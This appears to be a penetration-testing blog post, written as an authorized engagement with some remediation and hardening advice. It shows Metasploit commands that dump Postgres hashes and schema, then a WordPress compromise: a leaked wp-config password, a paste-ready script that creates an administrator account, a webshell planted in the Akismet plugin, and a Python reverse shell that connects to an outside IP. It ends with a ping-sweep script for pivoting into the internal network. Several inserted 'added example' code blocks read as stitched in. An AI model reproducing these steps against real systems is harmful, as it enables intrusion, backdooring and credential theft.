Here you can see that the Metasploit Framework has loaded to its main page:

 


Here we use Metasploit to dump the Postgres database hashes:

use auxiliary/scanner/postgres/postgres_hashdump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run


Next, we use Metasploit to dump the Postgres database schema:

use auxiliary/scanner/postgres/postgres_schemadump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run


Here you can see that Metasploit successfully dumped the postgres database schema:


Alright, now on to how to fix this. Before we cover how to fix it – quick shameless plug:

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Remediation

Dell provides documentation on how to fix this: change the default passwords of the embedded database roles and, unless it is genuinely needed, leave external access to the embedded database disabled (option 2 in the same script).

How to change the default passwords for the embedded PostgreSQL database.

Description

How to change the default passwords for the embedded PostgreSQL database for the users vkernel and Postgres.

Resolution

Log into the console of the virtual appliance, either directly in vSphere Client/Hyper V Manager or establish an ssh connection using a suitable application.

  • Log in using userid vkernel(default password vkernel)
  • Then become the root user using the command su - (default password password)
  • Issue the command /usr/local/vkernel/scripts/externalDbAccess.sh then press ENTER
  • Follow the prompts, as shown below:

VKernel-vOPS:~ # /usr/local/vkernel/scripts/externalDbAccess.sh
1 – Enable the embedded database access from the outside world
2 – Disable the embedded database access from the outside world
3 – Set the database users’ passwords

Please select one of the above:3
Stopping VKernel collector…
Initiated collector shutdown. It will take some time for the running collection tasks to complete.
We have now stopped VKernel collector
done
Stopping VKernel monitor…
VKernel monitor has been stopped
done
Stopping tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat stopped
Please enter the new password for the database role postgres:
Please retype the new password:
Please enter the new password for the database role vkernel:
Please retype the new password:
Unregistering the appliance from previous database…
Unregistering the appliance from the previous database is done
Migrating Hyper-V collector…
Migrating Hyper-V collector gets done
Updating database multi-appliances registry…
Updating database multi-appliances registry gets done
Updating VKernel configuration…
Updating VKernel configuration is done

Configuration completed
applying the password for user Postgres
applying the password for user vkernel
Starting tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat started in normal mode
Starting VKernel monitor…
VKernel vOPS Server 6.0: Build 120918.1924. Schema: 8-11.55
We have now started VKernel monitor
done
Starting VKernel collector…
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel collector has been started
done
VKernel-vOPS:~ #

Remediation reference:

https://support.software.dell.com/foglight-for-virtualization-standard-edition/kb/99015

PIVOTING TO THE INTERNAL NETWORK

Several months back, I ran a penetration test on a WordPress site. It was a generic web application security assessment. However, in this instance I managed to compromise the server and, most importantly, to pivot through the internal network. I figured I'd take the compromise walk-through and turn it into a blog post for you guys today. So, let's do this.

Although I ran several vulnerability scanners including Nessus, OpenVAS and HP WebInspect against the target website during the penetration test, it was Acunetix that found the vulnerability that would become the proverbial first domino. What a cute little gem.

COMPROMISING WORDPRESS

The scanner found a copy of wp-config.php, which is normally not viewable externally: PHP files are executed rather than served, but a backup copy with a different extension is sent to the browser as plain text. Probably there was an issue while the developer or system administrator was working on the server; maybe he or she got disconnected while editing the file, and that caused the text editor (vim with backups enabled or Emacs, for example) to leave a backup file called wp-config.php~. Wow, can you believe the scanner even found this?

Step 1: Running the Acunetix vulnerability scanner


Additionally, the Acunetix web vulnerability scanner identified the backup of a configuration file that contained database passwords located at http://www.targetcompany.com/blog/wp-config.php~

// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */

define('DB_NAME', 'targetcompany_blog');

/** MySQL database username */

define('DB_USER', 'targetcompanywp');

/** MySQL database password */

define('DB_PASSWORD', 'weakpassword123');

Step 2: Database port is not remotely accessible so look for phpMyAdmin

Although I had database credentials, I had noticed in the scan data from the other vulnerability scanners that the target server was behind a Cisco ASA firewall and that the database port, 3306, was not externally accessible. As a result, I couldn't connect to the MySQL database directly.

It's very common for webmasters to use a web-based tool such as phpMyAdmin to administer the database, and luckily for me the target company was running it. Since I had a database password, I guessed that the password for the targetcompanywp account, weakpassword123, might also be the password for the database administrative account named root, and I was correct. It worked!

Access to the phpMyAdmin page is here:

http://targetcompany.com/phpmyadmin/


Step 3: Credentials worked

The password weakpassword123 worked for the root account, and thus, I successfully logged in to phpMyAdmin.


Step 4: View all of the databases on the server

Here I see the names of the other databases on the server.

· targetcompany

· targetcompany_blog

· white_papers


Step 5: View the users and their respective privilege levels

Next, I moved on to the Privileges tab to see what level of privileges each user has. I hit the jackpot by being the root user: I have ALL PRIVILEGES.

Step 6: I can export all of the databases

If the goal of the attacker is to steal as much as possible, then the export option would, therefore, be the best way to go.

NOTE: This export option did NOT get executed in this engagement. Remember guys – we are pentesters – NOT hackers. As a result, the last thing you want to do as a pentester is actually to possess a customer’s business critical data. Proving you can access data is one thing, but staying on the safe side and just proving that you can get there – that’s usually all a customer needs to see to be happy with your work.


Step 7: Usernames and passwords

Afterward, I switched to the users table in the targetcompany database. Here I see that the passwords for ALL of the customers are stored in clear text, so I had to let the client know that this is not a good idea. Several more screens followed with more usernames and passwords.

Step 8: Looking at the MySQL database

I switched to the user table in the mysql database. Here the MySQL account passwords are hashed, as the WordPress ones are.

Step 9: Attacking WordPress

I switched to the wp_users table in the target-company_blog database. I see here that WordPress has properly hashed and salted passwords.


Step 10: Create a privileged account in WordPress

Here I create a privileged account named joe_strategicsec in WordPress, straight from phpMyAdmin. WordPress keeps the login in wp_users and the role in wp_usermeta, so creating the account is a multi-step process, which you will see in the following screenshots.

First, fill out the Insert form for the wp_users table. After submitting it you will see the SQL statement that phpMyAdmin executes.

Then insert a row into wp_usermeta for the new user's ID with the meta_key 'wp_capabilities', which sets the privilege level (role) of the account you just created, and again you will see the SQL statement execute.

Finally, insert a second wp_usermeta row for the same user with the meta_key 'wp_user_level', the legacy numeric privilege level, and watch that statement execute as well.
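The same three writes as one paste-able script, as an added example rather than the post's own phpMyAdmin clicks. It assumes WordPress's default wp_ table prefix; the login joe_strategicsec is the post's, while the password and e-mail are placeholders. mysql_statements() produces the MySQL for phpMyAdmin's SQL tab, and add_admin()/list_admins() replay the same inserts against an in-memory SQLite copy of the two tables so the logic can be checked without a target (Python 3 required).

```python
#!/usr/bin/env python3
"""Create a WordPress administrator directly in the database.

Added example, not code from the original post. mysql_statements() builds the
MySQL to paste into phpMyAdmin's SQL tab; add_admin()/list_admins() replay the
same logic against an in-memory SQLite copy of wp_users/wp_usermeta so it can
be checked without a target. Assumptions: default "wp_" table prefix; the
password and e-mail used below are placeholders.
"""
import hashlib
import sqlite3
from datetime import datetime, timezone

# Role array exactly as PHP serialises it: one key, "administrator" (13 chars) => true.
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'
ADMIN_LEVEL = "10"  # legacy wp_user_level; 10 = administrator


def _q(value):
    """Quote a string literal for the generated SQL (doubles embedded single quotes)."""
    return "'" + value.replace("'", "''") + "'"


def mysql_statements(login, password, email, prefix="wp_"):
    """MySQL text for phpMyAdmin.

    user_pass is set with MD5(): WordPress still accepts a bare MD5 there and
    re-hashes it with its own scheme on the first successful login.
    LAST_INSERT_ID() is captured into @uid once, because after the first
    usermeta INSERT it would return that row's umeta_id, not the user ID.
    """
    return "\n".join([
        f"INSERT INTO {prefix}users (user_login, user_pass, user_nicename, user_email, "
        "user_registered, user_status, display_name)",
        f"VALUES ({_q(login)}, MD5({_q(password)}), {_q(login)}, {_q(email)}, NOW(), 0, {_q(login)});",
        "SET @uid = LAST_INSERT_ID();",
        f"INSERT INTO {prefix}usermeta (user_id, meta_key, meta_value) "
        f"VALUES (@uid, '{prefix}capabilities', {_q(ADMIN_CAPS)});",
        f"INSERT INTO {prefix}usermeta (user_id, meta_key, meta_value) "
        f"VALUES (@uid, '{prefix}user_level', {_q(ADMIN_LEVEL)});",
    ])


def wp_schema(conn, prefix="wp_"):
    """Only the columns touched here (a constructed subset of the real schema)."""
    conn.executescript(f"""
        CREATE TABLE {prefix}users (
            ID INTEGER PRIMARY KEY AUTOINCREMENT, user_login TEXT, user_pass TEXT,
            user_nicename TEXT, user_email TEXT, user_registered TEXT,
            user_status INTEGER DEFAULT 0, display_name TEXT);
        CREATE TABLE {prefix}usermeta (
            umeta_id INTEGER PRIMARY KEY AUTOINCREMENT,
            user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)


def add_admin(conn, login, password, email, prefix="wp_"):
    """The same three writes as mysql_statements(), with bound parameters."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    cur = conn.execute(
        f"INSERT INTO {prefix}users (user_login, user_pass, user_nicename, user_email, "
        "user_registered, user_status, display_name) VALUES (?, ?, ?, ?, ?, 0, ?)",
        (login, hashlib.md5(password.encode()).hexdigest(), login, email, now, login),
    )
    uid = cur.lastrowid  # captured once, for the same reason as @uid above
    conn.executemany(
        f"INSERT INTO {prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
        [(uid, f"{prefix}capabilities", ADMIN_CAPS), (uid, f"{prefix}user_level", ADMIN_LEVEL)],
    )
    conn.commit()
    return uid


def list_admins(conn, prefix="wp_"):
    """Logins holding the administrator capability.

    Verifies the insert, and is the query a defender runs to spot admin accounts
    that never went through wp-admin (compare against the known-good list).
    """
    rows = conn.execute(
        f"SELECT u.user_login FROM {prefix}users u "
        f"JOIN {prefix}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = '{prefix}capabilities' "
        "AND m.meta_value LIKE '%\"administrator\";b:1;%' ORDER BY u.user_login"
    ).fetchall()
    return [r[0] for r in rows]


def demo():
    """Offline run: one pre-existing admin (constructed), then the pentester's account."""
    conn = sqlite3.connect(":memory:")
    wp_schema(conn)
    add_admin(conn, "siteowner", "owner-pw", "owner@example.com")
    uid = add_admin(conn, "joe_strategicsec", "Pentest123!", "joe@example.com")
    return uid, list_admins(conn)


if __name__ == "__main__":
    print(mysql_statements("joe_strategicsec", "Pentest123!", "joe@example.com"))
    print(demo())
```

Two details matter when doing this by hand in phpMyAdmin: WordPress accepts a bare MD5 in user_pass and upgrades it to its own hash on the first login, which is why MD5() is enough; and LAST_INSERT_ID() has to be saved into a variable before the first wp_usermeta insert, because after that insert it refers to the umeta_id of the meta row rather than to the user. The list_admins() query is also the one to hand the client afterwards so they can confirm the test account was removed.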

 

Step 11: Leveraging WordPress access

I can now see the joe_strategicsec account in the WordPress database. It is covered in red in the screenshot, but trust me, it is there.

Step 12: Login to the newly created WordPress account

I logged in as user joe_strategicsec and landed on the WordPress Dashboard, which confirms that the rows inserted by hand were accepted as a valid privileged account.

Step 13: WordPress Users

Here I view the WordPress users from the dashboard.

Step 14: Backdooring a WordPress plugin

I quickly switch to the Plugins section and back-door the Akismet plugin by replacing the source code of one of its files with a PHP webshell. The code for a webshell is pretty easy: just a few lines of PHP that hand a request parameter to a system command. This works because the dashboard's plugin editor can write to wp-content; defining DISALLOW_FILE_EDIT in wp-config.php removes that editor, which is the first hardening step to recommend here.

Step 15: Accessing the webshell

The Akismet file that was turned into a webshell now answers at:

https://www.targetcompany.com/blog/wp-content/plugins/akismet/akismet.php

To get the Linux server's internal IP address, you can execute the command (or ip addr on hosts that no longer ship ifconfig):

/sbin/ifconfig

To get the Linux server's distribution and version, you can execute the command (/etc/issue is only a login banner, so prefer /etc/os-release where it exists):

cat /etc/issue

To get the Linux server's kernel version, you can execute the command:

uname -a

Step 16: Use Python to create a reverse shell

Executing system commands via a webshell is often where you start when attacking web servers, but a real command shell is the preferred access method. Since the target web server is behind a Cisco firewall, I cannot connect to the server directly. I must make the server connect to me, since outbound firewall rules are often less restrictive than inbound rules; the callback port should be one the egress policy actually allows.

Inside the webshell I can use Python to open a reverse-connecting network socket that carries the Linux command shell. I do this by typing the following line of Python into the webshell (yes, I know there is no screenshot of this step):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("54.186.248.116",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The socket connects back to my listener, and the three os.dup2 calls point file descriptors 0, 1 and 2 (stdin, stdout and stderr) at that socket before /bin/sh -i starts, so the shell reads its commands from, and writes its output to, the connection.

In the screenshot below you can see that my netcat listener on port 1234 receives the connection from the compromised server.

Here I run /sbin/ifconfig again and the host has a 192.168 address, so I know that this box sits on an internal (RFC 1918) network.

PIVOTING TO THE INTERNAL NETWORK

Step 17: Attack the internal network

Next, I prove that I can attack the internal network with a command-line ping sweep. Since there was no Nmap installed, I wrote a quick for loop in the shell to ping every address in the subnet and print the ones that answered.

Step 18: No Nmap installed, so I went for a command-line ping sweep

The screenshot for this step shows the sweep running from the reverse shell. Keep in mind that hosts which drop ICMP will not show up, so an empty sweep is not proof of an empty subnet.
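The loop itself is only in the screenshot, so here is an added example (not the post's own code) of the same sweep written in Python, which was already on the box since the reverse shell above needed it. It assumes a Linux host with the iputils ping binary, a subnet given in CIDR form such as 192.168.1.0/24, and Python 3; the probe is a parameter so the host-list logic can be exercised without sending any packets.

```python
#!/usr/bin/env python3
"""Ping sweep of a subnet when nmap is not available.

Added example, not code from the original post. Python was already on the box
(the reverse shell depends on it), so the job the shell for loop did can be
done here with some parallelism. Assumptions: a Linux host with the iputils
ping binary (flags -c/-W) and a subnet in CIDR form such as 192.168.1.0/24.
"""
import ipaddress
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor


def hosts_in_subnet(cidr):
    """Usable host addresses of the subnet as strings (network/broadcast excluded)."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


def icmp_probe(host, timeout=1):
    """Send one ICMP echo request with the system ping; True if the host replied.

    -c 1: a single packet; -W timeout: seconds to wait for the reply (iputils).
    Output is discarded; only the exit status matters (0 = at least one reply).
    """
    rc = subprocess.call(
        ["ping", "-c", "1", "-W", str(timeout), host],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    return rc == 0


def ping_sweep(cidr, probe=icmp_probe, workers=32):
    """Probe every host in cidr in parallel; return the responders in address order.

    `probe` is any callable host -> bool. It defaults to icmp_probe, but can be
    swapped for e.g. a TCP connect to port 445 when ICMP is filtered internally.
    """
    hosts = hosts_in_subnet(cidr)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(probe, hosts))  # map keeps input order
    return [h for h, up in zip(hosts, results) if up]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.0/24"
    for host in ping_sweep(target):
        print(f"{host} is up")
```

From the reverse shell this is run as `python3 sweep.py 192.168.1.0/24` (drop the file in somewhere writable such as /tmp). Because the probe is pluggable, the same script doubles as a TCP sweep on a network that filters ICMP, which is the failure mode a silent ping sweep hides.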

At this point, I opted to end this portion of the engagement and notify the client that no further exploitation was required. It would only have been a matter of time to achieve root on this server via local privilege escalation, install more tooling, and pivot further into the internal network.

I hope you like this blog post, and I apologize for the pictures being fuzzy: I had to take them out of a pentest report and sanitize them. I decided to write this post because I thought it would be a good example of the kinds of things I will be covering in the new Pentester Lab Network, which I hope you will check out.